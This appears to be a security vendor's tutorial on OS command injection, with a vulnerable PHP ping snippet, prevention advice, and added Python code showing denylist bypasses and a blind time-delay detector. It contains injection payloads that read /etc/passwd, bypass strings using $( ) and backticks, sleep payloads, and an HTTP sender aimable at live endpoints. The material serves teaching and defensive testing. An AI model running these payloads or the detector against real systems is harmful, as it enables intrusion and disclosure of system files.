Command injection is a common security vulnerability. Injection was ranked #1 in the 2017 OWASP Top Ten list of web application security risks and remains in the top three of the 2021 edition, with OS command injection (CWE-78) among the most frequently exploited injection types.
A command injection vulnerability allows an attacker to execute arbitrary system commands on the host operating system (OS) of the attacked application. By hijacking the command the application meant to run, the attacker can gain a foothold on the system, obtain sensitive data, or take over the application server outright.
Typical outcomes of command injection attacks include writing malicious files into the runtime environment of the vulnerable application's server, executing shell commands, and abusing weaknesses in configuration files.
The Basics About Command Injection Vulnerabilities
Command injection becomes possible when a web application runs OS commands to interact with the host OS or the file system: for example to call a system utility, start a program written in another language, or run a shell, Python, Perl, or PHP script. This is legitimate functionality, but any attacker-controlled input that reaches it becomes an attack surface.
The root cause is user-supplied input that is not validated before being used to build a command. The attack works when the application passes unverified input (cookies, form fields, HTTP headers, URL parameters, and the like) into OS functions such as exec() and system(). The input is typically a string that the application concatenates onto a constant command prefix; the resulting string is handed to a shell, which interprets the whole thing as a command line, metacharacters included.
Command injection is also known as shell injection. The attacker's commands run in the system shell of the web server with the privileges of the application, so they can read or modify any data that account can reach, and they can be used to pivot to other systems that the server is connected to and trusted by. This is how an attacker turns the targeted application's privileges into wider control over the infrastructure.
Many OS command injection vulnerabilities are blind: the application does not return the command's output in the HTTP response. They are no less severe, since an attacker can still confirm execution and exfiltrate data through time delays, file writes, or out-of-band network requests.
The Differences Between Command Injection and Code Injection
While they seem similar, code injection and command injection are different types of vulnerabilities.
Code injection means the attacker supplies new code (for example PHP passed to eval()) that the vulnerable application then interprets and runs. It relies on insufficient validation of user data, and the injected code runs inside the application's own runtime, so what it can do is bounded by the capabilities of that runtime and the application's functionality.
Command injection, in contrast, abuses functionality the application already has for running system commands: no new application code is inserted, but the attacker changes which commands get executed. Because those commands run in the OS shell with the application's privileges, the attacker can reach the server, other systems in the infrastructure, and anything else that trusts the compromised host.
Methods for Command Injection
A command injection attack can happen due to various types of vulnerabilities.
Here are some common ones:
- Direct command injection: user input is concatenated into an OS command string without validation, so the attacker can append arbitrary commands
- Insecure deserialization: deserializing attacker-controlled data without validation can trigger object chains that end in a command execution call
- XML external entity injection (XXE): an XML parser that has not been configured to reject external entities in user-supplied XML can lead to denial of service, server-side request forgery (SSRF), and disclosure of sensitive files; on its own XXE does not run commands, but it often provides the access or information needed to reach a command execution flaw
- Arbitrary file inclusion/upload: applications that let users upload files with arbitrary extensions, or include files from a user-controlled path, can be made to place and execute attacker-supplied scripts inside the web root
- Server-side template injection (SSTI): applications that build server-side templates from user-supplied data may be made to evaluate attacker-controlled template expressions, which in many template engines can be escalated to running system commands
Examples of Command Injection
An attacker can break out of the ping command by adding a semicolon (or any other shell command separator) followed by arbitrary attacker-supplied operating system commands. The following PHP snippet is vulnerable:
<?php
$ip = $_POST['ip'];            // untrusted POST parameter, used as-is
$cmd = system('ping ' . $ip);  // concatenated straight into a shell command line
echo $cmd;                     // system() already prints the output; this echoes the last line again
?>
Example input for the ip parameter: ; cat /etc/passwd
The shell receives ping ; cat /etc/passwd, runs ping with no arguments, and then prints the contents of /etc/passwd in the response.
To keep a web application free of command injection, validate all user input against what the task actually needs (here, a syntactically valid IP address) and avoid passing it through a shell at all when an API that takes an argument array is available. Stripping shell metacharacters such as ; (semicolon), &, &&, |, ||, <, and > is a denylist and should only be a last resort: the shell has more ways to run a second command (backticks, $( ), newlines, and quote characters among them), and a list that misses one is bypassed entirely.
How to Prevent Command Injection
There are proven ways to limit the situations in which command injections can be executed in your systems.
Here are the most useful tips for applying:
- Avoid shell command execution functions wherever possible; most tasks (file operations, name lookups, image conversion) have library equivalents that never touch a shell
- Where a system command is unavoidable, use an API that takes the program and its arguments as separate values, such as Node.js execFile() or Python's subprocess.run() with an argument list, so that user input can never be interpreted as part of the command line
- Always validate user input that feeds a command, as part of a sound input validation strategy
- Prefer an allowlist that describes exactly what the input may look like (an IP address, a hostname, a filename from a fixed set) over filtering out command-related characters and delimiters, since a filter that misses a single metacharacter is bypassed
- If input must be placed into a shell string, escape it with the platform's quoting function (for example escapeshellarg() in PHP) so that metacharacters are treated as data rather than as delimiters, and reject malformed input outright
- Parameterize the command so that user input can only land in argument positions, never in the program name or in option positions (a value beginning with - can still change a program's behaviour even when no shell is involved)
- Never let users control which program is executed, even when calling execFile() correctly
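The vulnerable pattern from the examples section beside the hardened forms these tips describe, as an added Python example (not code from the original page or from Crashtest Security). It transliterates the page's 'ping ' . $ip concatenation, shows why stripping only ; & | < is insufficient (the bypass payloads are constructed for the demonstration), and then applies an allowlist check plus argument-array construction; shlex.quote() stands in for PHP's escapeshellarg(). Nothing in it executes a command: each function returns the command string or argv it would run.

```python
import ipaddress
import shlex
from typing import List

# Characters the page suggests stripping. They cover the common separators
# but not every way a POSIX shell can start a second command.
PAGE_DENYLIST = frozenset(";&|<")

# Constructed payloads that contain none of the denylisted characters yet
# still run a second command (or write a file) when the string reaches a shell.
BYPASS_PAYLOADS = [
    "8.8.8.8$(cat /etc/passwd)",        # $( ) command substitution
    "8.8.8.8`cat /etc/passwd`",         # backtick command substitution
    "8.8.8.8\ncat /etc/passwd",         # a newline ends a command just like ;
    "8.8.8.8 > /var/www/html/out.txt",  # output redirection into the web root
]
# Shell syntax that the denylist leaves untouched.
RESIDUAL_SHELL_SYNTAX = ("$(", "`", "\n", ">")


def vulnerable_ping_command(ip: str) -> str:
    """The page's PHP pattern, 'ping ' . $ip, transliterated: a shell string
    built by concatenation. Returned rather than executed."""
    return "ping " + ip


def strip_denylist(value: str) -> str:
    """The 'remove ; & | <' clean-up. Shown only to demonstrate its gaps."""
    return "".join(ch for ch in value if ch not in PAGE_DENYLIST)


def survives_denylist(payload: str) -> bool:
    """True if stripping leaves shell syntax that still runs a second command."""
    cleaned = strip_denylist(payload)
    return any(tok in cleaned for tok in RESIDUAL_SHELL_SYNTAX)


def safe_ping_argv(ip: str, count: int = 4) -> List[str]:
    """Allowlist validation plus argv construction. The value must parse as an
    IPv4/IPv6 address (ValueError otherwise) and is placed in its own argv slot
    after the options, so it can be neither a shell command nor an option.
    Execute with subprocess.run(argv); shell=False is the default."""
    parsed = ipaddress.ip_address(ip.strip())
    return ["ping", "-c", str(count), str(parsed)]


def quoted_ping_command(ip: str) -> str:
    """Last resort when a shell string cannot be avoided: quote the whole value
    so the shell sees one literal word (what escapeshellarg() does in PHP)."""
    return "ping -c 4 " + shlex.quote(ip)


if __name__ == "__main__":
    attack = "; cat /etc/passwd"
    print(vulnerable_ping_command(attack))
    for p in BYPASS_PAYLOADS:
        print(repr(strip_denylist(p)), "still injects:", survives_denylist(p))
    print(safe_ping_argv("8.8.8.8"))
    try:
        safe_ping_argv(attack)
    except ValueError as exc:
        print("rejected:", exc)
    print(quoted_ping_command(attack))
```

The allowlist check does double duty: besides ruling out every shell metacharacter, it guarantees the value cannot begin with -, so the argv form is safe from option injection as well. Quoting alone does not give that second guarantee, which is why it is listed last.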
A command injection vulnerability exists whenever user-supplied input reaches a command without being validated correctly by the web application, as the PHP ping snippet in the examples section above shows.
Testing for Command Injection Vulnerabilities
Application security is a top priority, so check your systems regularly for critical vulnerabilities such as this one.
Blind command injection calls for detection techniques that do not depend on seeing command output: inject a time delay (for example sleep 10) and compare response times against a baseline, redirect the command's output into a file under the web root and fetch it, or trigger an out-of-band (OOB) network interaction such as a DNS lookup or HTTP request to a server you control and watch for it to arrive.
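The time-delay technique, as an added Python example that is not part of the original page. The detector sends a baseline value and then a series of sleep payloads through a caller-supplied send() function and flags the first one that reliably adds the requested delay. So that it runs offline it includes two constructed stand-ins for the target (one that behaves like the vulnerable ping snippet, one that validates its input); http_sender() builds a real send() for a form parameter at a URL, and the URL and parameter name there are assumptions you replace for your own target.

```python
import ipaddress
import re
import time
import urllib.parse
import urllib.request
from typing import Callable, List, Optional

# Delay to request from the target. 0.3 s keeps the offline demo fast; against
# a real target use 5-10 s so the signal stands out above network jitter.
DELAY = 0.3


def delay_payloads(delay: float) -> List[str]:
    """Separators that start a new command, each followed by a sleep. The
    quoted variants break out when the input sits inside "..." or '...'."""
    s = f"{delay:g}"
    return [
        f"; sleep {s}",
        f"| sleep {s}",
        f"&& sleep {s}",
        f"$(sleep {s})",
        f"`sleep {s}`",
        f'" ; sleep {s} ; "',
        f"' ; sleep {s} ; '",
    ]


def timed(send: Callable[[str], None], value: str) -> float:
    """Seconds taken by one request carrying `value`."""
    start = time.monotonic()
    send(value)
    return time.monotonic() - start


def detect_time_based_injection(
    send: Callable[[str], None],
    baseline_value: str = "127.0.0.1",
    delay: float = DELAY,
    samples: int = 3,
) -> Optional[str]:
    """Return the first payload whose fastest response is still ~delay slower
    than the slowest baseline response, or None if no payload stalls the target.
    Using max() for the baseline and min() for the payload means one slow
    network round trip cannot produce a false positive."""
    baseline = max(timed(send, baseline_value) for _ in range(samples))
    for payload in delay_payloads(delay):
        elapsed = [timed(send, baseline_value + payload) for _ in range(samples)]
        if min(elapsed) - baseline >= delay * 0.8:
            return payload
    return None


def http_sender(url: str, param: str, timeout: float = 30.0) -> Callable[[str], None]:
    """Build a send() for a real target: POSTs the value as form field `param`.
    HTTP errors are swallowed; only the elapsed time matters here."""
    def send(value: str) -> None:
        data = urllib.parse.urlencode({param: value}).encode()
        try:
            urllib.request.urlopen(url, data=data, timeout=timeout).read()
        except Exception:
            pass
    return send


# Constructed stand-ins so the detector can be exercised without a network.
_INJECTED_SLEEP = re.compile(r"(?:;|\||&&|\$\(|`)\s*sleep\s+([0-9.]+)")


def constructed_vulnerable_target(value: str) -> None:
    """Stand-in for system('ping ' . $ip): instead of spawning a shell it
    emulates one, sleeping when the input smuggles in a sleep command."""
    m = _INJECTED_SLEEP.search(value)
    if m:
        time.sleep(float(m.group(1)))


def constructed_safe_target(value: str) -> None:
    """Stand-in for the validated version: anything that is not an IP address
    is rejected before any command would run."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return


if __name__ == "__main__":
    print("vulnerable stand-in:", detect_time_based_injection(constructed_vulnerable_target))
    print("hardened stand-in:", detect_time_based_injection(constructed_safe_target))
    # Against a real endpoint (hypothetical URL and parameter name):
    # print(detect_time_based_injection(http_sender("https://target.example/ping", "ip"), delay=10))
```

The same send() plumbing serves the other two blind techniques: for file redirection append > with a path under the web root and then fetch that path, and for OOB detection append a command such as nslookup against a hostname you control and watch that server's logs instead of the timer.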
You can use some common parameters to test for operating system command injections:
You can easily try out Crashtest Security’s Vulnerability Testing Software to spot command injection risks and prevent potential attacks.